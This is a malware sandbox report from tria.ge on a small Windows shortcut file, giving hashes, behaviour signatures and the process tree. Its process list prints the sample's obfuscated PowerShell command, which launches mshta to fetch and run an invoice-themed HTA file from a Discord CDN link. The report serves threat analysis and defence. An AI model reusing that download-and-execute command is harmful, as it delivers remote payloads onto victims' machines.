Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
29/05/2023, 08:22
Static task
static1
Behavioral task
behavioral1
Sample
04451999.lnk
Resource
win7-20230220-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
04451999.lnk
Resource
win10v2004-20230220-en
6 signatures
150 seconds
General
-
Target
04451999.lnk
-
Size
2KB
-
MD5
594a86d0fa8711e48066b1852ad13ac6
-
SHA1
35b840640e6a3c53a6ba0c6efa1a19a061f5c104
-
SHA256
b49d777b48ec591859c9374a2a707b179cb3770b54d9dc03b5c7f3ae2f06b360
-
SHA512
bc67e03c2a577c936c376b27cb141cb2f1e041a32dc4ebfa14c575289b3a15e5b27faec9e25f12caf9f00ada13b934c9adf348a2fef4d7202119f13880bf23ab
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1904 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1396 wrote to memory of 1904 1396 cmd.exe 28 PID 1396 wrote to memory of 1904 1396 cmd.exe 28 PID 1396 wrote to memory of 1904 1396 cmd.exe 28
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\04451999.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'https://cdn.discordapp.com/attachments/952087079892975626/1108466607375786045/INVOICE_MT103.hta'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904
-